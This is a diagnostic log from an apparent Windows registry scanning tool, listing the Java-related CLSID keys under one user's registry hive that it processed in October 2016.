[2016.10.18 21:01:31.245] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0012-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.245] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0013-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.245] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0013-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.245] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0013-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.245] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0014-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.246] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0014-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.246] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0014-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.246] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0015-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.246] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0015-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.246] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0015-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.246] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0016-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.246] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0016-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.246] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0016-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.246] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0017-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.247] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0017-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.247] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0017-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.247] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0018-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.247] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0018-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.247] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0018-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.247] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0019-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.247] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0019-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.247] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0019-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.247] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0020-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.247] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0020-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.247] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0020-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.248] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0021-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.248] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0021-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.248] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0021-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.248] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0022-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.248] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0022-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.248] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0022-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.248] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0023-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.248] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0023-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.248] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0023-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.248] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0024-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.249] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0024-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.249] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0024-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.249] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0025-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.249] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0025-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.249] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0025-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.249] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0026-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.249] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0026-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.249] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0026-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.249] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0027-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.249] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0027-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.249] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0027-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.250] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0028-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.250] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0028-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.250] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0028-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.250] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0029-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.250] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0029-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.250] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0029-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.250] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0030-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.250] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0030-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.250] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0030-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.250] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0031-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.250] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0031-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.250] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0031-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.251] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0032-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.251] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0032-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.251] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0032-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.251] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0033-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.251] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0033-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.251] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0033-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.251] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0034-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.251] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0034-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.251] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0034-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.251] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0035-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.251] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0035-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.252] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0035-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.252] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0036-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.252] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0036-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.252] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0036-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.252] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0037-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.252] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0037-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.252] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0037-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.252] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0038-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.252] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0038-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.252] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0038-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.252] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0039-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.253] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0039-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.253] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0039-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.253] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0040-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.253] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0040-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.253] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0040-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.253] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0041-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.253] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0041-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.253] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0041-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.253] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0042-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.253] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0042-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.253] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0042-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.254] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0043-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.254] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0043-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.254] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0043-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.254] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0044-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.254] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0044-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.254] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0044-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.254] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0045-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.254] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0045-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.254] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0045-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.254] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0046-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.255] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0046-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.255] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0046-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.255] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0047-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.255] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0047-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.255] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0047-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.255] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0048-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.255] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0048-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.255] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0048-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.255] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0049-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.255] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0049-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.256] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0049-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.256] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0050-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.256] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0050-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.256] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0050-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.256] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0051-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.256] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0051-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.256] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0051-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.256] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0052-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.256] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0052-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.256] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0052-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.256] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0053-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.257] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0053-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.257] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0053-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.257] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0054-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.257] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0054-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.257] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0054-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.257] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0055-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.257] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0055-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.257] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0055-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.257] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0056-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.257] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0056-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.257] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0056-ABCDEFFEDCBC}]
